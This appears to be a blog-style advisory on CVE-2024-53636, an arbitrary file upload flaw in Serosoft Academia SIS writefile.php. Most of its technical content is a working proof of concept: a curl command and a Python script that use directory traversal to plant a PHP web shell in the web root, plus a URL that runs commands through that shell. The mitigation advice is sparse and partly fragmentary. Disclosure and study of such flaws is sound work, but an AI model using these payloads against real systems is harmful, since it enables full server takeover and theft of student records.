CVE-2024-53636 - Exploiting Arbitrary File Upload in Serosoft Academia SIS EagleR-1..118

A serious security vulnerability has been discovered in the Serosoft Academia Student Information System (SIS) EagleR-1..118. Identified as CVE-2024-53636, this flaw allows an attacker to upload any file to the server using the /writefile.php endpoint. With a simple directory traversal (../) in the filePath parameter, attackers can upload malicious files anywhere on the server, ultimately leading to arbitrary code execution.

This post will break down how the vulnerability works, show you code examples, provide exploitation details, and include links to original references. All in plain English.

What Is CVE-2024-53636?

CVE-2024-53636 is an arbitrary file upload vulnerability in Serosoft Academia SIS EagleR-1..118. It happens because the web application fails to properly validate user-supplied paths in the filePath parameter of the writefile.php script. An attacker can use directory traversal (like ../../../) to escape the intended directory and write files anywhere the server user has write permission.

If a file like <?=phpinfo()?> or a web shell gets uploaded, the attacker can then execute commands on the server.

Vulnerable Endpoint

POST /writefile.php

fileContent: Content of the file to be created.

No permission checks or path sanitization are enforced on filePath.

PoC (Proof of Concept) Exploit

You can exploit this bug using cURL or a simple Python script.

Let’s try to upload a simple PHP webshell to the web root directory

curl -X POST http://TARGET/writefile.php \
  -d 'filePath=../../../../var/www/html/shell.php' \
  --data-urlencode 'fileContent=<?php system($_GET["cmd"]); ?>'

- ../../../../var/www/html/shell.php: Directory traversal to save the file in the website's root.

Now, you can access your shell

http://TARGET/shell.php?cmd=ls

Here’s a small Python script to automate the upload

import requests

url = "http://TARGET/writefile.php"
payload = {
    "filePath": "../../../../var/www/html/shell.php",
    "fileContent": "<?php system($_GET['cmd']); ?>"
}

response = requests.post(url, data=payload)
print("Status:", response.status_code)
if response.ok:
    print("Exploit sent. Check your shell.")

Restrict uploads to a safe directory.

- Remove any use of ../ in paths.

Full Exploit Walk-Through

1. Find an exposed /writefile.php endpoint on a target running SIS EagleR-1..118.
2. Craft a request with a directory traversal in filePath so the file lands in a web-exposed directory.

References

- NIST NVD - CVE-2024-53636
- Serosoft Academia Official Website
- Exploit Details on Exploit-DB
- PHP Directory Traversal Primer - OWASP

Conclusion

CVE-2024-53636 is a critical vulnerability that could allow remote attackers to completely compromise a server running Serosoft Academia SIS EagleR-1..118. This is a textbook example of why input validation is crucial for security. If you run this software, patch or mitigate immediately to prevent exploitation.

Timeline

Published on: 04/26/2025 15:15:44 UTC
Last modified on: 04/29/2025 16:15:29 UTC